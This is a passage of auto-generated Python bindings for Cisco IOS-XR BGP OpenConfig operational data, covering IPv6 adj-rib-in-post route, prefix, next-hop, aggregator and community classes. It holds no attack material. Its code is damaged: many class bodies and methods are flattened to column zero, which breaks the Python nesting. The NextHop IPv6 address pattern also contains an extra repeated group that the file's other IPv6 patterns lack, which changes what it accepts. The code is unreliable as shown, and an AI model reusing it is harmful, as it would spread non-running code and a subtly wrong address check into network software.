    self.adj_rib_in_pre = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre()
    self.adj_rib_in_pre.parent = self
    self._children_name_map["adj_rib_in_pre"] = "adj-rib-in-pre"

    # Segment path embeds the list-key predicate (evaluated lazily, so it
    # reflects the neighbor_address set at query time).
    self._segment_path = lambda: "open-config-neighbor" + "[neighbor-address='" + str(self.neighbor_address) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/open-config-neighbors/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the entity framework's validating setter; 'neighbor_address' is this list entry's only leaf."""
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor, ['neighbor_address'], name, value)
class AdjRibInPost(_Entity_):
"""
Adjacency rib in\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib in\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    """Set up YANG metadata for adj-rib-in-post and create its routes/num-routes child containers."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        # Python 2 needs the explicit two-argument form of super().
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, self).__init__()
    self.yang_name = "adj-rib-in-post"
    self.yang_parent_name = "open-config-neighbor"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, implementing class)
    self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes))])
    self._leafs = OrderedDict()  # no leafs directly under this container
    self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes()
    self.routes.parent = self
    self._children_name_map["routes"] = "routes"
    self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes()
    self.num_routes.parent = self
    self._children_name_map["num_routes"] = "num-routes"
    self._segment_path = lambda: "adj-rib-in-post"
    # Freeze the entity: subsequent writes must go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the entity framework's validating setter (no leafs on this container)."""
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    """Set up YANG metadata for the routes container and its dynamic list of route entries."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        # Python 2 needs the explicit two-argument form of super().
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, self).__init__()
    self.yang_name = "routes"
    self.yang_parent_name = "adj-rib-in-post"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, implementing class)
    self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route))])
    self._leafs = OrderedDict()  # no leafs directly under this container
    self.route = YList(self)  # dynamic list of Route entries
    self._segment_path = lambda: "routes"
    # Freeze the entity: subsequent writes must go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the entity framework's validating setter (no leafs on this container)."""
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IdentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    """Set up YANG metadata for a route entry: its leafs plus the prefix/attribute/timestamp child containers."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        # Python 2 needs the explicit two-argument form of super().
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, self).__init__()
    self.yang_name = "route"
    self.yang_parent_name = "routes"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, implementing class)
    self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved))])
    # python leaf name -> (YLeaf descriptor, accepted python types)
    self._leafs = OrderedDict([
        ('route', (YLeaf(YType.str, 'route'), ['str','str'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
        ('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
        ('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
    ])
    self.route = None
    self.neighbor_address = None
    self.path_id = None
    self.valid_route = None
    self.invalid_reason = None
    self.best_path = None
    self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName()
    self.prefix_name.parent = self
    self._children_name_map["prefix_name"] = "prefix-name"
    self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList()
    self.route_attr_list.parent = self
    self._children_name_map["route_attr_list"] = "route-attr-list"
    self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList()
    self.ext_attributes_list.parent = self
    self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
    self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate()
    self.last_modified_date.parent = self
    self._children_name_map["last_modified_date"] = "last-modified-date"
    # NOTE: "recieved" spelling is fixed by the YANG model node name and cannot be corrected here.
    self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved()
    self.last_update_recieved.parent = self
    self._children_name_map["last_update_recieved"] = "last-update-recieved"
    self._segment_path = lambda: "route"
    # Freeze the entity: subsequent writes must go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the entity framework's validating setter for this entry's leafs."""
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    """Set up YANG metadata for prefix-name: the prefix-length leaf and the nested prefix container."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        # Python 2 needs the explicit two-argument form of super().
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, self).__init__()
    self.yang_name = "prefix-name"
    self.yang_parent_name = "route"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, implementing class)
    self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix))])
    self._leafs = OrderedDict([
        ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
    ])
    self.prefix_length = None
    self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix()
    self.prefix.parent = self
    self._children_name_map["prefix"] = "prefix"
    self._segment_path = lambda: "prefix-name"
    # Freeze the entity: subsequent writes must go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the entity framework's validating setter; 'prefix_length' is the only leaf."""
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
    """
    Prefix

    .. attribute:: afi

        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False

    .. attribute:: ipv4_address

        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False

    .. attribute:: ipv6_address

        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for the prefix container (afi/ipv4-address/ipv6-address leafs, no children)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, self).__init__()
        self.yang_name = "prefix"
        self.yang_parent_name = "prefix-name"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
            ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
            ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
        ])
        self.afi = None
        self.ipv4_address = None
        self.ipv6_address = None
        self._segment_path = lambda: "prefix"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter for this container's leafs."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
    """Look up PrefixName's entry in the generated meta-info table."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    """Set up YANG metadata for route-attr-list: path-attribute leafs plus next-hop/aggregrator children and the community list."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        # Python 2 needs the explicit two-argument form of super().
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, self).__init__()
    self.yang_name = "route-attr-list"
    self.yang_parent_name = "route"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, implementing class)
    self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community))])
    # python leaf name -> (YLeaf descriptor, accepted python types)
    self._leafs = OrderedDict([
        ('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
        ('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
        ('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
        ('med', (YLeaf(YType.uint32, 'med'), ['int'])),
        ('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
        ('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
    ])
    self.origin_type = None
    self.as_path = None
    self.as4_path = None
    self.med = None
    self.local_pref = None
    self.atomic_aggr = None
    self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop()
    self.next_hop.parent = self
    self._children_name_map["next_hop"] = "next-hop"
    # NOTE: "aggregrator" spelling is fixed by the YANG model node name.
    self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes()
    self.aggregrator_attributes.parent = self
    self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
    self.community = YList(self)  # dynamic list of Community entries
    self._segment_path = lambda: "route-attr-list"
    # Freeze the entity: subsequent writes must go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the entity framework's validating setter for this container's leafs."""
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
    """
    NextHopAddress

    .. attribute:: afi

        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False

    .. attribute:: ipv4_address

        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False

    .. attribute:: ipv6_address

        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for the next-hop container (afi/ipv4-address/ipv6-address leafs, no children)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, self).__init__()
        self.yang_name = "next-hop"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
            ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
            ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
        ])
        self.afi = None
        self.ipv4_address = None
        self.ipv6_address = None
        self._segment_path = lambda: "next-hop"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter for this container's leafs."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
    """
    AggregatorList

    .. attribute:: as_

        AS number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    .. attribute:: as4

        AS4 number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False

    .. attribute:: address

        IPv4 address
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for aggregrator-attributes (as/as4/address leafs, no children)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
        self.yang_name = "aggregrator-attributes"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            # 'as' is a Python keyword, hence the trailing-underscore attribute name.
            ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
            ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
            ('address', (YLeaf(YType.str, 'address'), ['str'])),
        ])
        self.as_ = None
        self.as4 = None
        self.address = None
        self._segment_path = lambda: "aggregrator-attributes"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter for this container's leafs."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
    """
    CommunityArray

    .. attribute:: objects

        BGP OC objects
        **type**\: str
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for a community list entry (single 'objects' string leaf)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
